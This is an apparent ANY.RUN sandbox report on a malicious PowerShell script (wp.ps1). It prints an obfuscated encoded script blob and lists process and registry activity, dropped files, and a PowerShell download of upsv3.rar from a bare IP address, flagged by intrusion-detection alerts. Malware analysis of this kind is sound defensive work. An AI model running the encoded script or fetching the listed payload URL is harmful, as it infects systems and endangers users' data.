AEUAQABpACAAOABLAEMAPABbADkAcwBYAHcAUwBOACEAeQAtADkAbABjAH0AIwBaAGcAawBmAEgAXwBRAHoAagBvAHUAUQA1AHYANwBjAGIAdABFAG4AQwB1AD8AagBkAGMAWQAtAEgAMwBKAHYAUgBNAFEAUwBlAEEAbwBiAGEAMgB4AFAAaQB2AFEAdQBoAHYAYwBDAFcARAA8AFYAWwA4ADoAXwBvADkARgBTAEQAdwA/ADUARwBTAGcAagAmACYAZgAwAGkAKgB9AG0AaABUAGMATgA5AEAAWABKAGkAYQB4AFQAMQAgAF0ASwBnADIAQABvAEIAIABYAHIAbwBuAFIAWQBQACQAXQBYAF4ANABCAEYANgBwADMASwBDAFMAZQA2AGIARgBfAE8AYQA0AFAAJAApAE4ANABaADkAYgBjACUAUQBIAH0AMQBJAGUAKQA0ACgAVQBHAGsAMQBBADkAQABuAGMAUQAjACoAagB2AHMAeQB4AFEAOwA0ADoAbAAkAEUAZAAtAFAAcgBuAGYAfQBeAGwAcABSAGEAZwBdACoAOgA/AEUANgB9ADwAfQBnAEEALQAxAGsAKgBKAFsANwA0ADwASQApAGkAbABPAHwAdwA0AGsAZAAgAEIATwA7AGEAaAA5ACUAdQBYAFYAMABpAHIAYwB5ADQAdABUADgAIABdACQARwA+AE4APwBbAEoAYQBjAGIAeQB4AGEAJgBhAGwAPwBiAE4AVABaAGsAXQBYAF0AXwA2AFgAdwAmAGQALgA5AGgAUwBqAF0AcwBsAD8AIwBRACEASABMAD8AIABUAEoAdABRAGIAWQBPAHUAQABVADMAaABCAFoAewBsADkASgA0ADIAYgBwADsAeABYAHIAOwA4ACQAPgA7AFoAYwB6ACAATgBSAEcAawBuACgAeABnAEAAZgAzAHMAcgBBAGgAfQBWAD0AKgBKAGsAIwBLAG4AaABdAEIAKgBfAGwASgB5ACAADQAKACMAIAB6AEsAOgBwAGQALQBJAC4ASQBTAGwAXwBSAGIAWQByACUAZAB4ACwAQgB9ACYAVwBeAFcAcgBhACAAZABDACwAJgB0AGcAMAAqAC0AOQBnAEUAWABoAEwAQgBwAE0AKAA3AGwAeABIACoAewArAD0AWwBvAGcAJABqACUAKwBAAHYANgBCAHcANQBwAHUAPQAtAEQAQgBDAFYAKgBWAEEAWQBAAGsAVABYAHcASwBkAHYAbgBoAGUAcABCACAAPAB1ADsASAAqADAAbgA5AGYAcAA3AEIALAByAEoAMwBDAGcAOgBSAHwAYQAqAHMAOABqAEsASQBpADEAOgBTAHUAcwBQAFQAUAB3ADQAZwBxAHkAMwByAGIAOgA1AF4AUgBnAHIAQwBLAE4AMwBNAHAAZQAhAGgAfQBnAFQATgA/AGIAdwBEACUAYgB2AEQAeAAhAEUAMAAoAFAAfABKADEARQBnADIARgBFAGcAdQAmAEcAfQBsACMAZgA8AE0AZwBrACkALAB1AFEAUQBtACYANwA/AFsAZAAqAEoAUwBGAG8ALgBfAGYAZgB1AFgAdgAuAEgAdwBzADkAUgBJADUAKgBeAG0AOwBSADoATAB3ADgAYwAhACwATQA+AFYAYQBMAE0AZABRAF8AcQBzAEEAbgBLAFkAMAApACwAcQBPAC4AUQBzAFsALgAjACgAYwBkAFAAKQB0AEMAKwBnAHUAbgBbAHEAegAyAHsAKwBwAEUAeABQAEcAfABnAEUAQgBuACwAYgAwACYANgBbAHEAPQBnAHIAXgBCAE4AdgBTAEcAewBBADgAYwArAF4AUQBNADIAUQBAACQATAB7ACYAZwBWACQAMQBrAGYANQBNAHMAXgBxADEAVABaAG4ANAA8AGsAXgBKAEAAQQBpADsAYwB4AC4AQgAuAFQALgBvACoAVQBwAC4AMgBiAEYALgBrACsAYgAuAHcAUAAqADkAVgA9AGYARABvAE0AMgA8AFMAKAAwAGQAbQBWAGIALABPAEkAdgBVAHAANAAkAEIAWgBGAFMAVgBuAFAAPQBPAHYANwBeAEYAXwBAAGIAUwA8ADoAWgBwACAAewB7AGMAbgB1AGwAUwBSADQAcQB3AHkAfQBZAGwAPABUAFQAcQAjAEsAQQB3AF4AaQB9AHIAWgBzAFUARwBlADYAZABpAE8AbABuAGEAKQBsAD0ASwBhAEIAYgBqAFgAVQAsAEAAdwB2ADMAfQB3AGUAMQBpAFEAYQA0AHMATwA+ADsAagAzACwANwAmAHQAKwB1AC0AJgBnAF8AUwAsAHwAPAByAEMAMgBIAE0AIQBDAEYAbABWAFAAPQAgADUAPABdAFEAdwA9AHUALgBIAEkARwBqAEUANgA3AEUAJAA/ADIAXQB4AFcAWwBnADcAeABWAFMARgA0ADYAKgAtADsAeABvAHwAQwB4AEkAWQBhADwAYQAkAC4AXgAtAEoAdAAmAGEAegA6AGoAJABaADsAPQBfACYANgBJAF8AUwAqAHIATgBdADcARAA9AEIAOwB9ACgARgB2AGcALgBRAHYAWQB2AHEAOABXAGsAJQAqAC0AOwBSACQATQBXACQAMAAmAG4ATABKADIAMwA7AHEAXwAkAEgATABAAEcAVABaAG8ATgBtAFcAdQBEAEAALgAgAHsAfQBkADcAUQA7AG4AIQAgAFYAUwBrAEYANwAmACEAUgByAGsAfABiAF0ARQBMAGMATwA2AC0AIwAhAEgAbgAyAHAAcAAlAE4AYwBVADQALABJAHcAQgBmAEUANgB5AF8APwBWAHUAIAA6AEEAcgBTAD4ARQBrAG0AdABxAGIAdQBwAG8AdQBfADoARwBzAG4AaAAjAF8ATQAuAHoANQBoAEQAbAByAGYAfABhAFsAVwBuAEUASABjAEYAeABMADIATQBLACEAUAA9AD0AOAAgAF8ALgBIAFkAaQBDAC4ATgBMAEMAfQBZAGQARgBGAGkARQBeAF0ALABQAF4AagAtADAAUAAjACkAcQBfAEIAUQBVAF8AOQB2AE0ANABWAEoAcQBPAGMAKgB7ACAASwAwAHoAfABUAFQAKgB6AEwAaQBlAFAAcQBtAGUANQBRAGYAaQBWAEkAQgA9AFIAUQBmAF8APwBZAGIAaABKAEUAaAApAHgAcAAwADEAcwB7AHwAIABQAEMANgA5AEIARgB2AGcAMQBiAHoAeQBTAEEAQgB0AFcAJgBeADsALgAzAGQAaAAmAHUAWgBHACYARwBdADMAagBWADYAaAANAAoAIAAgACAAIAAgACAAIwAgAD0AOQB1AEgALQA8AF8AZgBDAF8AcAApAHAAIwBQAGkAYQB2AFMAUwApAFYAcABoAGoATQAuACAAWwA2AFIAWQB3AH0AJAAqAFgAdAB9AFsAZgBNACMAcgAgAGYALgAlAEUASgAyAF4AVgBbADkAIABXACEATQBDAHYAIQA3ADwATAAjACwAZAA/ADIAWAA+AD8AVgBkAEEANQBqAEsAJgBsAD4ALgBjAHgAXQAlAGgAPgBYADgATAAwAEQAKwBxADwAbAApAHEAQQArAE8AcABYACwAMwB1AFMAZwAmADMAaAA4ACoAWgBYADcALgBzADsAdgBPAFIAdQBRADQAdABOAEoASwB0ADQAUgByACgAfAAkACMAIwB9AHAAZQBuAHIAaQB3ACYALABCAEYAMABbAD0ANQA7AGEAXQB3AHgAPABRAHQAKQBnACAALQB1AE4AIQBDAHgAegA8AGIAWABZADAANABZAHcAUABoAFkAQQAyAE8AIAB1AHMAJQBiACwALgB9ACQAPwAzAGsANgBFAG4AfQAxAGkAWwBjAGQAPwApAFgAPwB6AHgALAB5AEEAZQAqAHYAMAApAE4AaQA5AE8ASwBPAEwASwBoAFQAZgA9ADQAawBRAE8ATQA5AG4ARQB6AEMANwBaAEwAPgBmADwAdgBoACMAcABAAGoAKgB0AHYAKQB7ADoAIQBlACwAPQBJACwAdABSADkAPQAsAHcARwAsAGoAYQBBAD0AQQAsADkAQwBHAE0AQwBtADYARgBdAGkANABdAEwAYQBXAD4AZAAyADAAKAA/AH0AcAAuAE4AbgAwAFcAbABoADgASQBoAGEANQAhADwAdAAyAEgAJAAxAFMAfQBOAEwAQAA5ACUAVgBxAEUAfQB8AC4AZwA/ADsAIQBoAGUANQBjAE4AXQBFAD0AdABnADsAKABfACUAbAB0AGIAZABBAGYANAB4ACYAIAB9AE4AOQBrAG0ANgB9AEgALgApAC4AbgA4ADgAWwBHAFQAUAAgAC0AMwBmAFQAcAAuADUAcABHAHEAKAA6ACoARwBbAD4AWgBtAGkATQBCAFoAcwBGAEcANwBzAHwAVgBMAGMATQA3ADEAYgAlADMASgAoAD4AUQBfAF0AUABfADcAPAA1ACwAOQBSAE4AeQAyAHUAXgAuAG0AaABVAFcAbwA4AFkAOABBAHIALgAyAEMAZgA1AGIAWQArAD4AagAtADQASQBLAE4AcQBlAFAARABIAGIAWQA8AFEAcwB6ACQAWQBnADwAPgBnADoAPQBMAE4AdgA+ADEAPQA1ADcANQBCAGgALABvAGYAKwBAAFQAYQAkAEQAWwA2AGoAOQBLADEAKQBsAF4AXgA7ADYAaAArAGsARwBdAGgAPQBhACsAMgBKAHAAcQB3AEMAXwAqADUAeQBSAF4AJQBKAFcAcQBMAEoAKwAmAGcAaQBSAEwALABKACwAWAB6AE4AXwBmAHAAPAA5ACYAWgBPACMAOwAuAHgAcwBaACoAagBtADwARwB8AEEAPgBJAHcAagBdAEAAOQA6AGkAfQAqAE8AcAB2AHUATQBqAG4AZwBpAEMAaAAxAFUAOQBvAFsAbQB2AF4AWwBGAFIASwAyAFkAfQBMAF8AbwBQAGYASQA7ADQAJgBnAHwATwBfACgALQBEAEEAdQBPAHEAXQBTAHYAPABbAFkASgBIACAAaQBdAEkAbQB0AHAATQBOACEAWwBnAEkAeQBNADgAVgBFACQAKgBwADYANwAwAF0ASwBnAFkAKgA+AHsAJABtAHgAZABJAG8ATABjAG4AdgBSAH0AZABpAFQARgBUAHgAIwB1AEMANQBFAEEAfQBGACQAXQBUAH0AdQBXAGwAYQAjAEIAXQAoAE0AcgAqAGoAJABHACQASgBvAGkAewAhADEAKwBrACsAJgBDAHQATwBzAEQASQBoAHkAYgBMADUAXgBiAF8ASQA0AFsAdgBhAHoAXgBDAEEAPAB9AEIAewAhAEQASAAlACEAcwAsAC4ARQBTAEEAVABfAEwAWgAqACwAcgA5AGMAUgB6ACUAPwBNAGcAdgAjAD8APAB5AF0AYgBHAD4AZQA/ADoAVAAqAD4AVQBBAGEAfAB5ADoAXgA9ACQAegBsAC0AKwApACoAIQBIAEcASQApAGcASgA0AGwAcQBkAHQAcwB4ACAAJQAtAGoAdwBLACYASABBADUANwAqAEQAXQBoAHwAKwAwACYAQwBCAHQAKQB6AF4AfAA8ADMANQBRACkAWQBnAGQAKwBGAF0AKwBDACEADQAKACAAIAAgACAAIAAgACAAIAApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
724"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=2428,i,9643899405495034576,4353840507900262531,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2364 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
756"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10950093268647784330,7984345445053328003,262144 --variations-seed-version --mojo-platform-channel-handle=3152 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
768"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc44bffff8,0x7ffc44c00004,0x7ffc44c00010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
864"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2080,i,4489154245050807712,13119722728266116525,262144 --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
128 400
Read events
128 327
Write events
73
Delete events
0

Modification events

(PID) Process:(4800) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4800) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4800) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(1688) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(424) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(424) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
Executable files
8
Suspicious files
190
Text files
451
Unknown types
0

Dropped files

PID
Process
Filename
Type
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:7863A3AC88C2D0015D97DE71E1819943
SHA256:F038388422789331D579058396F8D9720A0EB77E0BB99356663BD6E127944CE0
2072powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nsr0ernb.0yt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2220powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gyb4klht.j55.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2764powershell.exeC:\Users\admin\AppData\Local\Temp\upsv3.rarcompressed
MD5:40DF15C1FC1DC49DD9DF3CE4792C43E7
SHA256:84BAAA4449A2133DA47602E2F0B5212F5F96AA2444ED33847B2F8DDDBF1CB625
2764powershell.exeC:\Users\admin\AppData\Local\Temp\lgn1ztzq.0.cstext
MD5:261959F44C2F6143A87345385BF18B1B
SHA256:09B3000C53BA4235482EE682BE5070BECACA621FB2297E5A7B174401EEF92A2B
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF175890.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
6900csc.exeC:\Users\admin\AppData\Local\Temp\lgn1ztzq.dllexecutable
MD5:7F5004219CD5F90A31363763711111E2
SHA256:1B0173CAE0B9096CC27C3114596DD32BBEB21258A3AA8F7C26C76FFE8F721058
2072powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_iujlzfrg.rjj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3864powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bgu4fndf.54z.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3864powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_so2dtnjx.4u2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
251
DNS requests
336
Threats
17

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.55.110.193:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2764
powershell.exe
GET
200
5.252.153.72:80
http://5.252.153.72/uploads/upsv3.rar
unknown
unknown
2520
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:ILT9L6cUtG6c4S18iT9C0AMHzZ7tOq5YvfjD3KGtRpQ&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
6216
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:E_X7GdDIZoLJpJoYVMCxSXYKZpEcxRtn_NwVZEwaAGE&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
2804
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:dya5W7aAtYIm5Pn_95E4u7afCWWjBa2TJyca29fqqZU&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
2132
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:Y4yg5ZQTETzvJDQXaXXIKfoK9KDbZN24mI56uGdx2sc&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
2128
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:VkplVA_gUQpugWthg-QWel4KKnuWIqrkQKPCVptezsg&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
7032
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:awUKhKVN0bM-QZg8_e9KA9I5Az39-07V5c2RC3hufXQ&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
6772
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:r6GcU6zMK68sOHDRFvSsmqIAr7uNdjErDehwrVAg7TU&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
1564
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:bS9dV80TLZweEQYDSRuaUGNy8V0iufw-fOaRlAXh6PI&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5944
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5372
RUXIMICS.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2764
powershell.exe
5.252.153.72:80
PA
unknown
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1268
svchost.exe
23.55.110.193:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5124
powershell.exe
5.252.153.72:80
PA
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.16.206
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.55.110.193
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
t.me
  • 149.154.167.99
whitelisted
steamcommunity.com
  • 104.102.49.106
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted
clients2.google.com
  • 142.250.186.110
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 142.250.74.202
whitelisted
clientservices.googleapis.com
  • 216.58.208.99
  • 142.250.185.195
whitelisted

Threats

PID
Process
Class
Message
2764
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host RAR Request
2764
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2764
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
2764
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
2764
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2764
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
2764
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
5124
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
5124
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5124
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/wp.ps1